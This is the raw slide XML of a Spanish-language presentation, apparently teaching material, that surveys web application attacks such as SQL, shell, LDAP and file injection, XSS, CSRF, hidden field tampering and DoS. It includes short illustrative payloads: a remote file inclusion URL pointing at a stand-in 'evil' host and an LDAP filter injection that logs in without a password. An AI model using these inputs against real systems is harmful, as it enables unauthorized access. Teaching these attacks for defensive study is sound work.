              <a:rPr lang="es-BO" dirty="0" err="1"/>
              <a:t>Injection</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dirty="0"/>
              <a:t>Utiliza una serie de consultas SQL maliciosas para manipular directamente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>base de datos. Un atacante puede usar una aplicación web vulnerable burlar las medidas de seguridad normales y obtener acceso directo a datos de valor. Los ataques SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> pueden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>además </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>ser ejecutados desde la barra de direcciones, desde dentro de los campos de aplicación y a través de consultas y búsquedas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="158081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Introducción</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Las aplicaciones son generadas en el servidor o bien pueden ser ejecutadas por script dinámicamente en el navegador del cliente. Existen varios ataques de vulnerabilidad como SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>cross-site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> scripting, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>hijack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1051878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Ataques de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>inyección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de comandos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>inyección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Shell: Un atacante intenta elaborar una cadena de entrada para obtener acceso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> a un servidor web. La inyección de funciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> incluye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>StartProcess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>java.lang.Runtime.exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System.díagnostics.Process.Start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> similares.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>Embedding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>: Este tipo de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>ataque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>es utilizado para desfigurar virtualmente un sitio. Utilizando este ataque, un atacante agrega contenido HTML extra para vulnerar una aplicación web. En estos ataques, la entrada del usuario a una secuencia de comandos web se coloca en la salida HTML.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3562842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Ataques de inyección de comandos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>: El atacante explota esta vulnerabilidad e inyecta código malicioso dentro de los archivos del sistema:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2892021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¿Qué es inyección LDAP?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Esta técnica es utilizada para tomar ventaja de vulnerabilidades de entrada de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>aplicaciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>web no validadas para pasar los filtros LDAP utilizados para buscar Servicios de Directorio para obtener acceso directo a las bases de datos detrás del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>árbol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>LDAP.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3733938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¿Como trabaja la inyección LDAP?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Es similar a los ataques SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> pero explota parámetros de usuario para generar una consulta LDAP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. Para probar que una aplicación es vulnerable a inyección de código LDAP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>enviar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>una consulta al servidor que genera una entrada válida. Si el Servidor LDAP regresa un error, puede ser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>explotado </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>técnicas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de inyección de código.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="936909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¿Como trabaja la inyección LDAP?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Ej</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>: Si un atacante entra un nombre de usuario válido "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>juggyboy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>" e inyecta </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>juggyboy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}{&amp;}} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>luego la cadena URL se convierte en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{&amp;{USER=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>juggyboy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}{&amp;}}{Pass=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>blah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Solo el primer filtro es procesado por el servidor LDAP, solo la consulta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;{USER=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>juggyboy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}{&amp;}} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>es procesada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Esta consulta siempre será </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" u="sng" dirty="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t> y el atacante inicia sesión en el sistema sin una contraseña válida.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2191742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Ataque de manipulación de campo escondido</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>1. Cuando un usuario hace una selección en una página HTML, la selección es típicamente almacenada como valores de campo de formulario y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>enviados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>a la aplicación como una solicitud HTTP (GET o POST).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>2. HTML también puede almacenar valores de campos como campos escondidos, que no son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>renderizados</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t> a la pantalla por el navegador, pero son recolectados y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>enviados </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>como parámetros durante las presentaciones del formulario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>3. Los atacantes pueden examinar el código HTML de la página y cambiar los valores del campo escondido para poder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>enviar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>solicitudes al servidor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2432222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p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>Explotan vulnerabilidades en las páginas web dinámicamente generadas, lo cual permite a los atacantes maliciosos inyectar un script del lado del cliente dentro de las páginas web vistas por otros usuarios. Esto ocurre cuando datos invalidados ingresados son </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>incluidos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>en el contenido dinámico que es </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>enviado </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>al navegador del usuario para prestación. Los atacantes inyectan maliciosos JavaScript, VBScript, ActiveX, HTML o flash para la ejecución en el sistema de la víctima escondiendo sus solicitudes legítimas.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="1 Título"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ataques Cross-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="829188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Ataque Cross-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Rorgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> (CSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>1. Explotan vulnerabilidades de páginas web que permiten al atacante forzar un navegador de un usuario no sospechoso para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>enviar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>solicitudes maliciosas que sin su intención.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>2. La víctima tiene una sesión activa con un sitio seguro y simultáneamente visita un sitio malicioso, que inyecta una solicitud HTTP a un sitio de confianza dentro de la sesión de la víctima, comprometiendo su integridad.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1637325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Ataque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Los atacantes agotan los recursos del servidor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>enviando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>cientos de paquetes de solicitud de recursos intensa, como sacando imágenes grandes o solicitando páginas dinámicas que requieren una búsqueda costosas en los servidores de base de datos. Blancos: CPU, memoria, sockets, ancho de banda del disco, de la base de datos, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>procesos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3415405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Ataque </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Ejemplos: </a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de inicio de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>sesión</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>taques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de bloqueo de </a:t>
            </a:r>
            <a:r>
